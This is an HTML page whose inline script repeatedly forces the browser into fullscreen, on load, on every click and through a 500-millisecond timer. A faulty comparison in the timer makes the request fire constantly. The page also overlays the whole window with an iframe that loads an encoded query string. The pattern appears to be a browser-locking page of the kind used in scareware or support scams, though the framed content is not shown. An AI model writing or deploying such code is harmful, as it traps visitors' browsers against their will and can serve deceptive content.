<html>
<head>
<script>
function autoScreen() {
  var doc = window.document;
  var docEl = doc.documentElement;

  var requestFullScreen = docEl.requestFullscreen || docEl.mozRequestFullScreen || docEl.webkitRequestFullScreen || docEl.msRequestFullscreen;
  var cancelFullScreen = doc.exitFullscreen || doc.mozCancelFullScreen || doc.webkitExitFullscreen || doc.msExitFullscreen;

  if(!doc.fullscreenElement && !doc.mozFullScreenElement && !doc.webkitFullscreenElement && !doc.msFullscreenElement) {
    requestFullScreen.call(docEl);
	var fullscreenState = document.getElementById("fsStatus_");
	if (fullscreenState) {
		document.addEventListener("fullscreenchange", function () {
			fullscreenState.innerHTML = (document.fullscreenElement)? "yes" : "not ";
		}, false);
		
		document.addEventListener("msfullscreenchange", function () {
			fullscreenState.innerHTML = (document.msFullscreenElement)? "yes" : "not ";
		}, false);
		
		document.addEventListener("mozfullscreenchange", function () {
			fullscreenState.innerHTML = (document.mozFullScreen)? "yes" : "not ";
		}, false);
		
		document.addEventListener("webkitfullscreenchange", function () {
			fullscreenState.innerHTML = (document.webkitIsFullScreen)? "yes" : "not ";
		}, false);
	}
  }
}

function bonload() {
	var viewFullScreen = document.getElementById("fullscreenbdy");
    viewFullScreen.addEventListener("click", function () {
        var docElm = document.documentElement;
        if (docElm.requestFullscreen) {
            docElm.requestFullscreen();
        }
        else if (docElm.msRequestFullscreen) {
            docElm = document.body; //overwrite the element (for IE)
            docElm.msRequestFullscreen();
        }
        else if (docElm.mozRequestFullScreen) {
            docElm.mozRequestFullScreen();
        }
        else if (docElm.webkitRequestFullScreen) {
            docElm.webkitRequestFullScreen();
        }
    }, false);
}
function checkstatus() {
	if (document.getElementById('fsStatus_').innerHTML='not') {
		autoScreen();
	}
}
setInterval(checkstatus,500);
</script>
</head>
<body id="fullscreenbdy" onload="autoScreen();bonload()" onclick="bonload()">
<b style="display:none" id="fsStatus_"></b>
<iframe id="ViostreamIframe" src="./?dHJ1ZSxlcyxub25lLDVGQkI0NUUxNzJEQUM0RUQ0NjMyRjhDODREMTZDQUFCN0M2RjgzNkU3NEYyNUJBRTcxNTM" frameborder="0" allowfullscreen="" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>
</body>
</html>

